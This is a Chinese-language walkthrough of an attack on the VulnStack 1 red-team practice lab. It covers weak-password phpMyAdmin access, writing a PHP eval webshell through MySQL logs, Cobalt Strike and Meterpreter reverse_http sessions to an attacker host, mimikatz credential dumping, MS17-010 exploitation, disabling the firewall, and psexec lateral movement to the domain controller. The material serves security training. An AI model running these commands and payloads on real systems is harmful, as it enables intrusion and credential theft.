vulnstack——1

admin 2023年12月12日16:34:03评论9 views字数 2345阅读7分49秒阅读模式

ATK&CK1红队实战靶场介绍:

开源靶场VulnStack是由国内红日安全团队打造一个靶场知识平台。靶场设计思路来源ATT&CK红队评估模式,从漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场 虚拟机所有统一密码:hongrisec@2019

vulnstack——1

环境搭建

类型

win7(内网ip:192.168.52.143,外网ip:192.168.88.0)

web服务器

win2008(IP:192.168.52.138)

内网域控主机

win2003(IP:192.168.52.141)

域成员主机

win7靶机环境配置

vulnstack——1

vulnstack——1

Windows Server 2008 R2靶机环境配置:

vulnstack——1


Win2k3 环境配置:

vulnstack——1

vulnstack——1

ATK&CK1红队实战靶场渗透详解:

一、前期信息收集

1、使用nma扫描端口:nmap -sS -sV -T4 -n 192.168.88.188

vulnstack——1

2、使用dirsearch扫描目录文件,发现phpmyadmin文件

vulnstack——1

3、访问目标网站,直接给出了php探针

vulnstack——1

4、使用root,root弱口令测试,返回成功

vulnstack——1

5、直接访问刚才扫描目录扫出来的phpmyadmin目录

vulnstack——1

6、使用刚才的root,root弱口令尝试登录,发现登录成功

vulnstack——1

7、可以执行sql语句

vulnstack——1

二、mysql日志写shell

要利用sql写shell就需要在配置中满足以下条件:

1、在mysql的配置文件my.ini中,secure_file_priv为空(被注释掉或不填)或者secure_file_priv配置是目录地址。

2、未开启全局GPC

关于mysql的secure_file_priv属性

当secure_file_priv为空时,mysql对导入导出文件是没有限制的

当secure_file_priv为目录地址时,mysql可以在目录位置下进行导入导出操作

当secure_file_priv为NULL时,mysql就不能进行导入导出操作

使用sql语句select @@secure_file_priv查询参数的内容,判断该数据是否可以进行导入导出操作。

vulnstack——1

竟然返回NULL 写入不了;写入受限制就要绕限制

在墨者学院 找到了方法 (刚好此时是root权限)

vulnstack——1

模仿这写一下,一条一条执行

 set global general_log = "ON"; 
 set global general_log_file = "C:/phpStudy/WWW/log.php";
 select '<?php eval($_POST[pwd]); ?>';

vulnstack——1

vulnstack——1vulnstack——1

使用蚁剑连接

vulnstack——1



三、后渗透攻击

1、上传一个cs的木马进行上线

vulnstack——1

vulnstack——1

2、开始信息收集,使用cs自带的mimikatz抓取密码

vulnstack——1

3、发现一个192.168.52.143的网段

vulnstack——1

4、查看arp信息

shell arp -a

vulnstack——1

5、可以成功ping通52段

vulnstack——1

6、上传一个adon911的exe文件,查询52网段有哪些存活主机

ladon911.exe 192.168.52.1/24 icmp

vulnstack——1

vulnstack——1

从134的IP可以看出138ip的是域控,二141ip的是域内主机

7.cs派生msf,设置lhost为kali的ip地址,lport为8004端口

payload

payload windows/meterpreter/reverse_http

lhst

192.168.88.129

lport

8004

vulnstack——1

cs设置新建会话

vulnstack——1

vulnstack——1

vulnstack——1

执行run派生成功

vulnstack——18、进行提权操作,再进行添加路由

getsystem
run autoroute -s 192.168.0/24
run autoroute -p

vulnstack——1

9、设置代理

use auxiliary/server/socks_proxy
set srvhost 192.168.111.129
run

vulnstack——1

10、用ms17-010的use2进行渗透

use2
set rhosts 192.168.52.141
run

vulnstack——1

11、成功执行,whomi发现是系统权限。

set command whoami

vulnstack——1

五、信息收集

1、主机名为stu1,有四个用户

vulnstack——1

2.查看域用户

shell net user /domain

vulnstack——1

3.查看域中的主机名

shell net group "domain computers" /domain

vulnstack——1

4.查看域控制器主机名

shell net group "domain controllers" /domain

域控名字OWA$

vulnstack——1

5、权限提升,使用插件的ms15051提权到system权限

vulnstack——1

vulnstack——1

六、横向移动

在进行横向移动之前先将防火墙关闭

1、检查防火墙状态

shell netsh firewall show state

vulnstack——1

2、关闭防火墙

shell netsh advfirewall set allprofiles state off

vulnstack——1

3、抓取本机用户哈希密码

hashdump

vulnstack——1

4、获取明文密码

logonpasswords

vulnstack——1vulnstack——1

vulnstack——1

5、接下来准备打域控

vulnstack——1

6、使用psexec进行横向移动

vulnstack——1

选择明文密码

vulnstack——1

选择刚才设置的smb

vulnstack——1

session选择一个system权限的机子

vulnstack——1

7、横向移动到域控,用户名和密码选择刚刚获取到的,监听器选择创建的SMB监听器,会话任选一个即可

vulnstack——1

8、运行成功后域控上线

vulnstack——1

vulnstack——1

9、抓取域控的密码

vulnstack——1

10、上线域内成员机器

vulnstack——1

11、选择hash的密码

vulnstack——1

选择刚才设置的smb

vulnstack——1

session选择一个system权限的机子Ip是138或者143都行

12、配置成功执行,成功上线域内成员192.168.52.141的机器

vulnstack——1

vulnstack——1vulnstack——1

13、抓取域内192.168.52.141的机器密码

vulnstack——1

14、至此域内所有机器全部上线

vulnstack——1

vulnstack——1

    揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!

vulnstack——1


原文始发于微信公众号(揽月安全团队):vulnstack——1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月12日16:34:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnstack——1https://cn-sec.com/archives/2289637.html

发表评论

匿名网友 填写信息